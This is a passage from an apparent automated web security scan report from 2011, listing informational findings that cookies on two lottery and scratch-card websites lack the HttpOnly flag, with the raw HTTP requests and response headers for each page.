<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.neteller.com/">here</a>.</p>
</body
...[SNIP]...

12.284. http://www.pclscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=21zqne55winufojltrq5mhau; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: UniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.285. http://www.pclscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ytdn42ugius2ml55n3ca0455; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:27 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: UniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.286. http://www.pclscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjkur145mkgzhfqat41wv5ic; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: UniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.287. http://www.pclscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5lxnekmaeiw34y45mrj1pc45; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:22 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: UniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.288. http://www.pclscratch.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuwhs3rkmog2nqfbfnefuyv5; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: UniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29565


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.289. http://www.pclscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Terms.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsnjci453g20ax45pj1enb55; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.290. http://www.postcodelottery.com/AboutUs.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:47 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:47 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16632

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.291. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/PrivacyPolicy.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/PrivacyPolicy.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...

12.292. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /AboutUs/TermsAndConditions.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/TermsAndConditions.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:30 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <link rel="shortcut i
...[SNIP]...

12.293. http://www.postcodelottery.com/Charities.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Charities.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Charities.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:33 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:34 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 22665

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.294. http://www.postcodelottery.com/DrawResults.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /DrawResults.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DrawResults.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:26 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 20168

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.295. http://www.postcodelottery.com/FunGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:34 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:35 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11179

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.296. http://www.postcodelottery.com/FunGames/FreeGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/FreeGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/FreeGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12413

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.297. http://www.postcodelottery.com/FunGames/PaidGames.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11318

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.298. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames/PostcodeLotteryScratch.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.route1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 15840

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.299. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /FunGames/PostcodeChallenge.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PostcodeChallenge.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:46 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
